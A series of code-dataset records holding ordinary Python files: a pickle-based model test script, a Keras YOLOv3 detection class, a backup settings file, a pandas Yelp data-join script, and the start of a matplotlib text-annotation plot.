\"\"\"\n\n # 读入测试数据\n print('Loading test data...')\n logging.info('Loading test data...')\n # 根据配置文件加载测试集\n with open(config_dict[\"test_path\"], 'rb') as f: # test_path是测试数据路径\n test_data = cPickle.load(f)\n '''\n 测试集test_data是一个自定义类Corpus的实例化对象\n Corpus类在sr/shared/classes.py中定义\n Corpus包含Topic;Topic包含Document(以及E和V指称);Document包含Sentence\n Sentence包含Token(以及真实的和预测的E和V指称);...\n '''\n print('Test data have been loaded.')\n logging.info('Test data have been loaded.')\n\n # 运行算法进行测试\n test_model(test_data) # test_model这玩意是上边定义的函数\n\n\nif __name__ == '__main__':\n\n main()\n","sub_path":"src/all_models/predict_model0.py","file_name":"predict_model0.py","file_ext":"py","file_size_in_byte":8154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"375008265","text":"# -*- coding: utf-8 -*-\n\"\"\"\nClass definition of YOLO_v3 style detection model on image and video\n\"\"\"\n\nimport os\nimport cv2\nimport colorsys\nfrom timeit import default_timer as timer\n\nimport numpy as np\nfrom keras import backend as K\nfrom keras.models import load_model\nfrom keras.layers import Input\nfrom keras.utils import multi_gpu_model\nfrom PIL import Image, ImageFont, ImageDraw\nimport tensorflow as tf\n\nTHIS_DIR = os.path.dirname(os.path.realpath(__file__))\nCWD = os.getcwd()\nif CWD == THIS_DIR:\n from yolo3.model import yolo_eval, yolo_eval_batch, yolo_body, tiny_yolo_body\n from yolo3.utils import letterbox_image\nelse:\n from .yolo3.model import yolo_eval, yolo_eval_batch, yolo_body, tiny_yolo_body\n from .yolo3.utils import letterbox_image\n\nKERAS_YOLO_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass YOLO(object):\n _defaults = {\n # \"model_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/yolov3-tiny.h5'),\n \"model_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/yolov3.h5'),\n # 
\"model_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/pp_reanchored_best_train.h5'),\n # \"model_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/pp_reanchored_best_val.h5'),\n # \"anchors_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/tiny_yolo_anchors.txt'),\n # \"anchors_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/PP_ALL_anchors.txt'),\n \"anchors_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/yolo_anchors.txt'),\n \"classes_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/coco_classes.txt'),\n # \"classes_path\": os.path.join(KERAS_YOLO_DIR, 'model_data/PP_classes.txt'),\n \"score\" : 0.5,\n \"iou\" : 0.45,\n # \"model_image_size\" : (288, 512), # Height, Width\n \"model_image_size\" : (608, 608),# Height, Width\n # \"input_image_size\" : (1080, 1920), # Height, Width\n \"gpu_num\" : 1,\n \"batch_size\" : 1,\n }\n\n @classmethod\n def get_defaults(cls, n):\n if n in cls._defaults:\n return cls._defaults[n]\n else:\n return \"Unrecognized attribute name '\" + n + \"'\"\n\n def __init__(self, bgr, pillow=False, gpu_usage = 0.5, old=False, gpu_device='cuda:0', **kwargs):\n '''\n Params\n ------\n - bgr : Boolean, signifying if the inputs is bgr or rgb (if you're using cv2.imread it's probably in BGR) \n - pillow : Boolean, flag to give inputs in pillow format instead of ndarray-like, this will override bgr flag to False\n - batch_size : int, inference batch size (default = 1)\n - gpu_device : str, device string from forms\n '''\n self.__dict__.update(self._defaults) # set up default values\n self.__dict__.update(kwargs) # and update with user overrides\n self.class_names = self._get_class()\n self.anchors = self._get_anchors()\n self.bgr = bgr\n self.pillow = pillow\n if self.pillow:\n self.bgr = False\n # config = tf.ConfigProto()\n # config.gpu_options.allow_growth=True\n # config.gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_usage)\n dev_splits = gpu_device.split(':')\n dev = dev_splits[0]\n if dev == 'cuda':\n self.device_idx = dev_splits[-1]\n self.device_str = \"/device:GPU:{}\".format(self.device_idx)\n else: # cpu\n self.device_idx = \"-1\"\n self.device_str = \"/device:CPU:0\"\n self.device = gpu_device\n # os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpu_device\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_usage)\n # sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=True, allow_soft_placement = True))\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, allow_soft_placement = True))\n K.set_session(sess)\n self.sess = K.get_session()\n self.boxes, self.scores, self.classes = self.generate(old=old)\n self.graph = tf.get_default_graph()\n print('Keras Yolov3 started at batch size of {} and confidence threshold of {}, using gpu device {}, bgr is {}, pillow is {}.'.format(self.batch_size, self.score, self.device_str, self.bgr, self.pillow))\n print('Model input size {}'.format(self.model_image_size))\n # self.boxes, self.scores, self.classes = self.generate()\n warmup_height, warmup_width = self.model_image_size # Height, Width\n warmup_image = np.zeros((warmup_height,warmup_width,3), dtype='uint8')\n print('Warming up...')\n self._detect_batch([warmup_image] * self.batch_size, warmup_width, warmup_height)\n print('YOLO warmed up!')\n # print('Input image size initialised as {}x{} (WxH)! 
Please give the appropriate argument inputs if this is wrong.'.format(self.input_image_size[1], self.input_image_size[0]))\n\n def _get_class(self):\n classes_path = os.path.expanduser(self.classes_path)\n with open(classes_path) as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names\n\n def _get_anchors(self):\n anchors_path = os.path.expanduser(self.anchors_path)\n with open(anchors_path) as f:\n anchors = f.readline()\n anchors = [float(x) for x in anchors.split(',')]\n return np.array(anchors).reshape(-1, 2)\n\n def generate(self, old = False):\n model_path = os.path.expanduser(self.model_path)\n assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'\n\n # Load model, or construct model and load weights.\n num_anchors = len(self.anchors)\n num_classes = len(self.class_names)\n is_tiny_version = num_anchors==6 # default setting\n with tf.device(self.device_str):\n try:\n self.yolo_model = load_model(model_path, compile=False)\n except:\n self.yolo_model = tiny_yolo_body(Input(shape=(None,None,3)), num_anchors//2, num_classes) \\\n if is_tiny_version else yolo_body(Input(shape=(None,None,3)), num_anchors//3, num_classes)\n self.yolo_model.load_weights(self.model_path) # make sure model, anchors and classes match\n else:\n assert self.yolo_model.layers[-1].output_shape[-1] == \\\n num_anchors/len(self.yolo_model.output) * (num_classes + 5), \\\n 'Mismatch between model and given anchor and class sizes'\n\n print('{} model, anchors, and classes loaded.'.format(model_path))\n\n # Generate colors for drawing bounding boxes.\n hsv_tuples = [(x / len(self.class_names), 1., 1.)\n for x in range(len(self.class_names))]\n self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n self.colors = list(\n map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),\n self.colors))\n np.random.seed(10101) # Fixed seed for consistent colors across runs.\n np.random.shuffle(self.colors) # Shuffle colors to decorrelate adjacent classes.\n np.random.seed(None) # Reset seed to default.\n\n with tf.device(self.device_str):\n # Generate output tensor targets for filtered bounding boxes.\n self.input_image_shape = K.placeholder(shape=(2, ))\n if self.gpu_num>=2:\n self.yolo_model = multi_gpu_model(self.yolo_model, gpus=self.gpu_num)\n\n with tf.device(self.device_str):\n if old:\n print('using old yolo eval')\n boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,\n len(self.class_names), self.input_image_shape,\n score_threshold=self.score, iou_threshold=self.iou)\n else:\n boxes, scores, classes = yolo_eval_batch(self.yolo_model.output, self.anchors,\n len(self.class_names), self.input_image_shape, self.batch_size,\n score_threshold=self.score, iou_threshold=self.iou)\n return boxes, scores, classes\n # return boxes, scores, classes\n\n def _refresh(self, batch_size):\n self.batch_size = batch_size\n # Generate colors for drawing bounding boxes.\n hsv_tuples = [(x / len(self.class_names), 1., 1.)\n for x in range(len(self.class_names))]\n self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n self.colors = list(\n map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),\n self.colors))\n np.random.seed(10101) # Fixed seed for consistent colors across runs.\n np.random.shuffle(self.colors) # Shuffle colors to decorrelate adjacent classes.\n np.random.seed(None) # Reset seed to default.\n\n # Generate output tensor targets for filtered bounding boxes.\n 
self.input_image_shape = K.placeholder(shape=(2, ))\n if self.gpu_num>=2:\n self.yolo_model = multi_gpu_model(self.yolo_model, gpus=self.gpu_num)\n\n # boxes, scores, classes = yolo_eval_batch(self.yolo_model.output, self.anchors,\n # len(self.class_names), self.input_image_shape, batch_size=2,\n # score_threshold=self.score, iou_threshold=self.iou)\n # boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,\n # len(self.class_names), self.input_image_shape,\n # score_threshold=self.score, iou_threshold=self.iou)\n\n self.boxes, self.scores, self.classes = yolo_eval_batch(self.yolo_model.output, self.anchors,\n len(self.class_names), self.input_image_shape, self.batch_size,\n score_threshold=self.score, iou_threshold=self.iou)\n\n def regenerate(self, batch_size):\n if batch_size == self.batch_size:\n return\n self._refresh(batch_size)\n warmup_height, warmup_width = self.model_image_size # Height, Width\n\n warmup_image = np.zeros((warmup_height,warmup_width,3), dtype='uint8')\n print('Warming up...')\n self._detect_batch([warmup_image] * self.batch_size, warmup_width, warmup_height)\n print('YOLO warmed up!')\n\n def _preprocess(self, image, expand=True):\n '''\n Params\n ------\n image : ndarray-like or PIL image (in that case, self.pillow better be True)\n expand : Boolean, usually True for single image cases\n\n Returns\n -------\n ndarray-like\n '''\n if isinstance(image, np.ndarray):\n if self.bgr: image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = Image.fromarray( image )\n else:\n assert isinstance(image, Image.Image),'image not a PIL.Image.Image!' \n \n if self.model_image_size != (None, None):\n assert self.model_image_size[0]%32 == 0, 'Multiples of 32 required'\n assert self.model_image_size[1]%32 == 0, 'Multiples of 32 required'\n boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size)))\n else:\n new_image_size = (image.width - (image.width % 32),\n image.height - (image.height % 32))\n boxed_image = letterbox_image(image, new_image_size)\n image_data = np.array(boxed_image, dtype='float32')\n image_data /= 255.\n if expand:\n image_data = np.expand_dims(image_data, 0) # Add batch dimension.\n return image_data\n\n def _detect(self, image):\n image_data = self._preprocess(image)\n out_boxes, out_scores, out_classes = self.sess.run(\n [self.boxes, self.scores, self.classes],\n feed_dict={\n self.yolo_model.input: image_data,\n self.input_image_shape: [image.shape[0], image.shape[1]], # height, width\n K.learning_phase(): 0\n })\n return out_boxes, out_scores, out_classes\n\n def _preprocess_batch(self, images):\n # images_data = np.array( [self._preprocess(image) for image in images] )\n images_data = np.zeros((len(images),*self.model_image_size,3))\n for i, image in enumerate(images):\n if image is not None:\n images_data[i] = self._preprocess( image, expand=False )\n return images_data\n\n def _detect_batch(self, images, im_width, im_height):\n '''\n detect function \n\n Params\n ------\n images : list of ndarrays\n im_width : width of image\n im_height : height of image\n\n '''\n if len( images ) <= 0:\n return None\n # assert all([images[0].shape == img.shape for img in images[1:]]),'Network does not acccept images of different sizes. 
please speak to evan.'\n\n # assert len(images) <= self.batch_size,'Length of image batch given ({}) is bigger than what network was initialised as ({}).'.format(len(images), self.batch_size)\n # assert len(images) == self.batch_size,'Length of image batch given ({}) different from what network was initialised as ({}).'.format(len(images), self.batch_size)\n if len(images) < self.batch_size:\n images.extend([None]*int(self.batch_size - len(images)))\n assert len(images) == self.batch_size\n images_data = self._preprocess_batch(images)\n with self.graph.as_default():\n out_boxes, out_scores, out_classes = self.sess.run(\n [self.boxes, self.scores, self.classes],\n feed_dict={\n self.yolo_model.input: images_data,\n self.input_image_shape: [im_height, im_width], # height, width\n # self.input_image_shape: [images[0].shape[0], images[0].shape[1]], # height, width\n # self.input_image_shape: [self.input_image_size[0], self.input_image_size[1]], # height, width\n K.learning_phase(): 0\n })\n return out_boxes, out_scores, out_classes\n # return out_boxes, out_scores, out_classes\n\n def detect_get_box_in(self, images, box_format='ltrb', classes=None, buffer_ratio=0.):\n '''\n Params\n ------\n - images : ndarray-like or list of ndarray-like\n - box_format : string of characters representing format order, where l = left, t = top, r = right, b = bottom, w = width and h = height\n - classes : list of string, classes to focus on\n - buffer : float, proportion of buffer around the width and height of the bounding box\n\n Returns\n -------\n if one ndarray given, this returns a list (boxes in one image) of tuple (box_infos, score, predicted_class),\n \n else if a list of ndarray given, this return a list (batch) containing the former as the elements,\n\n where,\n - box_infos : list of floats in the given box format\n - score : float, confidence level of prediction\n - predicted_class : string\n\n '''\n \n no_batch = False\n if isinstance(images, list):\n if len(images) <= 0 : \n return None\n # else:\n # assert isinstance(images[0], np.ndarray)\n # if all([images[0].shape == img.shape for img in images[1:]]):\n # print('WARNING from yolo module: Input images in batch are of diff sizes, the input size will take the first image in the batch, you will have to scale the output bounding boxes of those input image whose sizes differ from the first image yourself.')\n # assert all([images[0].shape == img.shape for img in images[1:]]),'Network does not acccept images of different sizes. 
please speak to eugene.'\n elif isinstance(images, np.ndarray):\n images = [ images ]\n no_batch = True\n \n if isinstance(images[0], np.ndarray):\n im_height, im_width = images[0].shape[:2]\n else:\n assert isinstance(images[0], Image.Image)\n im_width, im_height = images[0].size\n\n # import time\n # tic = time.time()\n all_out_boxes = []\n all_out_scores = []\n all_out_classes = []\n for i in range( int(np.ceil(len(images)/self.batch_size)) ):\n from_ = i*self.batch_size\n to_ = min(len(images),i*self.batch_size+self.batch_size)\n n = to_ - from_ \n # print('Inferencing {} images'.format(n))\n out_boxes, out_scores, out_classes = self._detect_batch(images[from_:to_],im_width, im_height)\n all_out_boxes.extend(out_boxes[:n])\n all_out_scores.extend(out_scores[:n])\n all_out_classes.extend(out_classes[:n])\n # tic2 = time.time()\n all_dets = []\n for out_boxes, out_scores, out_classes in zip(all_out_boxes, all_out_scores, all_out_classes):\n dets = []\n for i, c in reversed(list(enumerate(out_classes))):\n predicted_class = self.class_names[c]\n if classes is not None and predicted_class not in classes:\n continue\n score = out_scores[i]\n box = out_boxes[i]\n\n top, left, bottom, right = box\n\n width = right - left + 1\n height = bottom - top + 1\n width_buffer = width * buffer_ratio\n height_buffer = height * buffer_ratio\n \n top = max( 0.0, top-0.5*height_buffer )\n left = max( 0.0, left-0.5*width_buffer )\n bottom = min( im_height - 1.0, bottom + 0.5*height_buffer )\n right = min( im_width - 1.0, right + 0.5*width_buffer )\n\n box_infos = []\n for c in box_format:\n if c == 't':\n box_infos.append( int(round(top)) ) \n elif c == 'l':\n box_infos.append( int(round(left)) )\n elif c == 'b':\n box_infos.append( int(round(bottom)) )\n elif c == 'r':\n box_infos.append( int(round(right)) )\n elif c == 'w':\n box_infos.append( int(round(width+width_buffer)) )\n elif c == 'h':\n box_infos.append( int(round(height+height_buffer)) )\n else:\n assert False,'box_format given in detect unrecognised!'\n assert len(box_infos) > 0 ,'box infos is blank'\n\n dets.append( (box_infos, score, predicted_class) )\n # dets.append((top, left, bottom, right) (predicted_class, score, ) )\n all_dets.append(dets)\n # tic3 = time.time()\n # print('Batch Forward pass: {}s'.format(tic2 - tic))\n # print('Post proc: {}s'.format(tic3 - tic2))\n if no_batch:\n return all_dets[0]\n else:\n return all_dets\n\n def detect_ltwh(self, np_image, classes=None, buffer=0.):\n raise Exception('This method has been deprecated, please use detect_get_box_in for a more general method.')\n '''\n detect method\n\n Params\n ------\n np_image : ndarray\n\n Returns\n ------\n list of triples ([left, top, width, height], score, predicted_class)\n\n '''\n # image = Image.fromarray(np_image)\n # if self.model_image_size != (None, None):\n # assert self.model_image_size[0]%32 == 0, 'Multiples of 32 required'\n # assert self.model_image_size[1]%32 == 0, 'Multiples of 32 required'\n # boxed_image = letterbox_image(image, tuple(reversed(self.model_image_size)))\n # else:\n # new_image_size = (image.width - (image.width % 32),\n # image.height - (image.height % 32))\n # boxed_image = letterbox_image(image, new_image_size)\n # image_data = np.array(boxed_image, dtype='float32')\n\n # image_data /= 255.\n # image_data = np.expand_dims(image_data, 0) # Add batch dimension.\n # image_data = self.preprocess(image)\n\n # out_boxes, out_scores, out_classes = self.sess.run(\n # [self.boxes, self.scores, self.classes],\n # feed_dict={\n # 
self.yolo_model.input: image_data,\n # self.input_image_shape: [image.size[1], image.size[0]],\n # K.learning_phase(): 0\n # })\n\n # image_data = self.preprocess(image)\n # out_boxes, out_scores, out_classes = self.sess.run(\n # [self.boxes, self.scores, self.classes],\n # feed_dict={\n # self.yolo_model.input: image_data,\n # self.input_image_shape: [image_data.shape[0], image_data.shape[1]], # height, width\n # K.learning_phase(): 0\n # })\n\n # dets = []\n\n # for i, c in reversed(list(enumerate(out_classes))):\n # predicted_class = self.class_names[c]\n # if classes is not None and predicted_class not in classes:\n # continue\n\n # score = out_scores[i]\n # box = out_boxes[i]\n # top, left, bottom, right = box\n # width = right - left + 1\n # height = bottom - top + 1\n # width_buf = (width) * buffer\n # height_buf = (height) * buffer\n # top = max(0, np.floor(top + 0.5 - height_buf).astype('int32'))\n # left = max(0, np.floor(left + 0.5 - width_buf).astype('int32'))\n # bottom = min(image.size[1], np.floor(bottom + 0.5 + height_buf).astype('int32'))\n # right = min(image.size[0], np.floor(right + 0.5 + width_buf).astype('int32'))\n\n # dets.append( ([left, top, width, height], score, predicted_class) )\n\n # return dets\n\n def detect_path(self, path, box_format='ltrb', classes=None):\n img = cv2.imread(path)\n assert self.pillow == False,'Please initialise this object with pillow = False'\n assert self.bgr == True,'Please initialise this object with bgr = True'\n # print('WARNING: pillow set to False and bgr set to True, do not use this yolo object for anything else.')\n dets = self.detect_get_box_in(img, box_format='ltrb', classes=classes)\n return dets\n\n # def detect_persons(self, image, classes=None, buf=0.):\n # return self.detect( image, classes=['person'], buffer=buf )\n\n def get_detections_dict(self, frames, classes=None, buffer_ratio=0.0):\n '''\n Params: frames, list of ndarray-like\n Returns: detections, list of dict, whose key: label, confidence, t, l, w, h\n '''\n if frames is None or len(frames) == 0:\n return None\n all_dets = self.detect_get_box_in( frames, box_format='tlbrwh', classes=classes, buffer_ratio=buffer_ratio )\n \n all_detections = []\n for dets in all_dets:\n detections = []\n for tlbrwh,confidence,label in dets:\n top, left, bot, right, width, height = tlbrwh\n # left = tlbr[1]\n # bot = tlbr[2]\n # right = tlbr[3]\n # width = right - left\n # height = bot - top\n detections.append( {'label':label,'confidence':confidence,'t':top,'l':left,'b':bot,'r':right,'w':width,'h':height} ) \n all_detections.append(detections)\n return all_detections\n\n def get_triple_detections(self, frame, classes=None):\n raise Exception('this method has been deprecated, please use detect_get_box_in for a more general method.')\n # '''\n # Params\n # ------\n # frame : np array\n \n # Returns\n # ------\n # list\n # List of triples ( [left,top,w,h] , confidence, detection_class)\n\n # '''\n # if frame is None:\n # return None\n # image = Image.fromarray( frame )\n # dets = self.detect( image, classes=classes )\n # detections = []\n # for label, confidence, tlbr in dets:\n # top = tlbr[0]\n # left = tlbr[1]\n # bot = tlbr[2]\n # right = tlbr[3]\n # width = right - left\n # height = bot - top\n # detections.append( ([left, top, width, height], confidence, label) ) \n # return detections\n\n # for reid PERSON ONLY\n def get_detections_batch(self, frames):\n # TODO: BATCH INFER THIS SHIT\n all_detections = []\n for frame in frames:\n if frame is None:\n 
all_detections.append([])\n continue\n curr_detections = self.get_detections_dict(frame, classes=['person'])\n # image = Image.fromarray( frame )\n # dets = self.detect_get_box_in( image, classes=['person'] )\n # curr_detections = []\n # for label, confidence, tlbr in dets:\n # top = tlbr[0]\n # left = tlbr[1]\n # bot = tlbr[2]\n # right = tlbr[3]\n # width = right - left\n # height = bot - top\n # tlwh = {'t':top, 'l':left, 'w':width, 'h':height}\n # curr_detections.append( {'label':label, 'confidence':confidence, 'tlwh':tlwh} )\n all_detections.append(curr_detections)\n return all_detections\n\n def crop_largest_person(self, image, buf=0.1):\n raise Exception('this method has been deprecated, please use detect_get_box_in for a more general method.')\n # dets = self.detect( image, classes=['person'], buffer=buf )\n # # get the largest detection\n # largest_det = None\n # for _,_,tlbr in dets:\n # if largest_det is None:\n # largest_det = tlbr\n # else:\n # detarea = (tlbr[3]-tlbr[1]) * (tlbr[2]-tlbr[0])\n # ldarea = (largest_det[3]-largest_det[1]) * (largest_det[2]-largest_det[0])\n # if detarea > ldarea:\n # largest_det = tlbr\n\n # if largest_det is not None:\n # # crop image\n # min_x = largest_det[1]\n # min_y = largest_det[0]\n # max_x = largest_det[3]\n # max_y = largest_det[2]\n # return image.crop( (min_x, min_y, max_x, max_y) )\n # return image\n\n def get_largest_person(self, np_image, buf=0.1):\n raise Exception('this method has been deprecated, please use detect_get_box_in for a more general method.')\n # # image = Image.fromarray(np_image)\n # dets = self.detect_ltwh( np_image, classes=['person'], buffer=buf )\n # # get the largest detection\n # largest_det = None\n # for det in dets:\n # if largest_det is None:\n # largest_det = det\n # else:\n # detarea = det[0][2] * det[0][3]\n # ldarea = largest_det[0][2] * largest_det[0][3]\n # if detarea > ldarea:\n # largest_det = det\n # return largest_det\n\n def get_largest_person_and_bb(self, np_image, buf=0.1):\n raise Exception('this method has been deprecated, please use detect_get_box_in for a more general method.')\n # image = Image.fromarray(np_image)\n # dets = self.detect( image, classes=['person'], buffer=buf )\n # # get the largest detection\n # largest_det = None\n # for _,_,tlbr in dets:\n # if largest_det is None:\n # largest_det = tlbr\n # else:\n # detarea = (tlbr[3]-tlbr[1]) * (tlbr[2]-tlbr[0])\n # ldarea = (largest_det[3]-largest_det[1]) * (largest_det[2]-largest_det[0])\n # if detarea > ldarea:\n # largest_det = tlbr\n\n # if largest_det is not None:\n # # crop image\n # min_x = largest_det[1]\n # min_y = largest_det[0]\n # max_x = largest_det[3]\n # max_y = largest_det[2]\n # return np.array(image.crop( (min_x, min_y, max_x, max_y) )), largest_det\n # return None, None\n\n def close_session(self):\n self.sess.close()\n\ndef detect_video(yolo, video_path, output_path=\"\"):\n import cv2\n vid = cv2.VideoCapture(video_path)\n if not vid.isOpened():\n raise IOError(\"Couldn't open webcam or video\")\n video_FourCC = int(vid.get(cv2.CAP_PROP_FOURCC))\n video_fps = vid.get(cv2.CAP_PROP_FPS)\n video_size = (int(vid.get(cv2.CAP_PROP_FRAME_WIDTH)),\n int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n isOutput = True if output_path != \"\" else False\n if isOutput:\n print(\"!!! 
TYPE:\", type(output_path), type(video_FourCC), type(video_fps), type(video_size))\n out = cv2.VideoWriter(output_path, video_FourCC, video_fps, video_size)\n accum_time = 0\n curr_fps = 0\n fps = \"FPS: ??\"\n prev_time = timer()\n while True:\n return_value, frame = vid.read()\n image = Image.fromarray(frame)\n image = yolo.detect_image(image)\n result = np.asarray(image)\n curr_time = timer()\n exec_time = curr_time - prev_time\n prev_time = curr_time\n accum_time = accum_time + exec_time\n curr_fps = curr_fps + 1\n if accum_time > 1:\n accum_time = accum_time - 1\n fps = \"FPS: \" + str(curr_fps)\n curr_fps = 0\n cv2.putText(result, text=fps, org=(3, 15), fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=0.50, color=(255, 0, 0), thickness=2)\n cv2.namedWindow(\"result\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"result\", result)\n if isOutput:\n out.write(result)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n yolo.close_session()\n\nif __name__ == '__main__':\n import cv2\n import time\n # yolo = YOLO(bgr=True, batch_size=1)\n \n # img = cv2.imread('/home/dh/Pictures/frisbee.jpg')\n # img2 = cv2.imread('/home/dh/Pictures/dog_two.jpg')\n # img2 = cv2.resize(img2, (img.shape[1], img.shape[0]))\n # img3 = cv2.imread('/home/dh/Pictures/puppy-dog.jpg')\n # img3 = cv2.resize(img3, (img.shape[1], img.shape[0]))\n\n # img_batch = [img]\n # # img_batch = [img, img2]\n # # img_batch = [img, img2, img3]\n\n # all_dets = yolo.detect_get_box_in(img_batch, box_format='ltrb')\n # # boxes, scores, classes = yolo._detect_batch(img_batch)\n # for dets, im in zip(all_dets, img_batch):\n # im_show = im.copy()\n # for det in dets:\n # # print(det)\n # ltrb, conf, clsname = det\n # l,t,r,b = ltrb\n # cv2.rectangle(im_show, (int(l),int(t)),(int(r),int(b)), (255,255,0))\n # print('{}:{}'.format(clsname, conf))\n # cv2.imshow('',im_show)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n # print('REDO with diff batch size')\n\n # img_batch = [img, img2, img3]\n # yolo.regenerate(batch_size=len(img_batch))\n # all_dets = yolo.detect_get_box_in(img_batch, box_format='ltrb')\n # for dets, im in zip(all_dets, img_batch):\n # im_show = im.copy()\n # for det in dets:\n # # print(det)\n # ltrb, conf, clsname = det\n # l,t,r,b = ltrb\n # cv2.rectangle(im_show, (int(l),int(t)),(int(r),int(b)), (255,255,0))\n # print('{}:{}'.format(clsname, conf))\n # cv2.imshow('',im_show)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n # numstreams = 1\n ip = 'test.jpg'\n img = cv2.imread(ip)\n # vp = '/media/dh/HDD/reid/street_looped.mp4'\n # cap = cv2.VideoCapture(vp)\n # caps = []\n # for _ in range(numstreams):\n # caps.append(cv2.VideoCapture(vp))\n \n bs = 1\n imgs = [ img for _ in range(bs)]\n yolo = YOLO(bgr=True, batch_size=bs, model_image_size=(608, 608))\n # yolo = YOLO(bgr=True, batch_size=bs, model_image_size=(896, 896))\n # yolo = YOLO(bgr=True, batch_size=bs, model_image_size=(896, 512))\n\n # frame_idx = 0\n # while True:\n # frames = []\n # for cap in caps:\n # ret, frame = cap.read()\n # if not ret:\n # break\n # frames.append(frame)\n # # frames = [frame] * numstreams\n # frame_idx += 1\n # if (frame_idx-1)%10:\n tic = time.perf_counter()\n all_dets = yolo.detect_get_box_in(imgs, box_format='ltrb')\n toc = time.perf_counter()\n print('infer time:', toc-tic)\n # for dets, im in zip(all_dets, frames):\n # im_show = frame.copy()\n im_show = img.copy()\n for det in all_dets[0]:\n # print(det)\n ltrb, conf, clsname = det\n l,t,r,b = ltrb\n cv2.rectangle(im_show, (int(l),int(t)),(int(r),int(b)), (255,255,0))\n 
cv2.putText(im_show, '{:0.2f}'.format(conf), (int(l),int(b)), cv2.FONT_HERSHEY_DUPLEX, fontScale=1, color=(255,255,0), lineType=2)\n        # print('{}:{}'.format(clsname, conf))\n    cv2.imwrite('test_out.jpg', im_show)\n    # cv2.imshow('',im_show)\n    # if cv2.waitKey(1) == ord('q'):\n    #     break\n    # cv2.destroyAllWindows()\n","sub_path":"yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":33129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"271253276","text":"'''\n    Settings.py\n    This is where I am going to define the settings for the whole thing.\n\n    Below is an example specifications dictionary.\n\n'''\n\nspecifications = {\n    'number_of_backups': 3,\n    'source_file_name': \"backup.txt\",\n    'extension': 'txt',\n    'prefix': 'backup_',\n    'source_dir': 'C:\\\\back_up',\n    'dest_dir': 'C:\\\\back_up_dest',\n    }\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"39041862","text":"# Kevin Enario\n# Data integration of all 5 tables\n# MULTI STEP PROCESS DUE TO LARGE DATA\n\n# native imports\n\n# third party imports\nimport pandas as pd\n\n# engineer data\ndef main():\n    join_tip_user()\n    # join_bus_check_tip() \n\ndef join_tip_user():\n    dfTip = pd.read_csv('csv/yelp_tip_dataset.csv')\n    dfUser = pd.read_csv('csv/yelp_user_dataset.csv')\n\n    # drop column\n    dfTip = dfTip.drop('Unnamed: 0', axis=1)\n\n    toJoin = dfTip.merge(dfUser, how='left', on='user_id')\n    print(toJoin.dtypes)\n\ndef join_bus_check_tip():\n    dfBus = pd.read_csv('csv/yelp_business_dataset_transformed.csv')\n    dfCheck = pd.read_csv('csv/yelp_checkin_dataset.csv')\n    dfTip = pd.read_csv('csv/yelp_tip_dataset.csv') \n\n    # drop column\n    dfBus = dfBus.drop(['address', 'attributes', 'hours'], axis=1)\n    dfCheck = dfCheck.drop('Unnamed: 0', axis=1) \n\n    # join\n    toJoin = dfBus.merge(dfCheck, how='left', on='business_id').merge(dfTip, how='left', on='business_id')\n\n    # reduce\n    \n    # test\n    print(toJoin.dtypes)\n    # print(toJoin[['name', 'text']].head(50))\n\n    # convert to csv\n    # toJoin.to_csv('csv/bus_check_tip.csv', index=False) \n\n\n#################################################### run main ###########################################\nif __name__ == '__main__':\n    main()","sub_path":"dataPreprocessing/integratedDataset/joinDataset.py","file_name":"joinDataset.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"545779519","text":"# -*- coding: utf-8 -*-\n#\nimport helpers\n\nimport matplotlib.pyplot as plt\nimport numpy\n\n\ndef plot():\n    fig = plt.figure()\n\n    xxx = numpy.linspace(0, 5)\n    yyy = xxx**2\n    plt.text(\n        1, 5, 'test1', size=50, rotation=30.,\n        ha='center', va='bottom', color='r', style='italic',\n        weight='light',\n        bbox=dict(\n            boxstyle='round, pad=0.2',\n            ec=(1., 0.5, 0.5),\n            fc=(1., 0.8, 0.8),\n            ls='dashdot'\n        )\n    )\n    plt.text(\n        3, 6, 'test2', size=50, rotation=-30.,\n        ha='center', va='center', color='b', weight='bold',\n        bbox=dict(\n            boxstyle='square',\n            ec=(1., 0.5, 0.5),\n            fc=(1., 0.8, 0.8),\n        )\n    )\n    plt.text(\n        4, 8, 'test3', size=20, rotation=90.0,\n        ha='center', va='center', color='b', weight='demi',\n        bbox=dict(\n            boxstyle='rarrow',\n            ls='dashed',\n            ec=(1., 0.5, 0.5),\n            fc=(1., 0.8, 0.8),\n        )\n    )\n    plt.text(\n        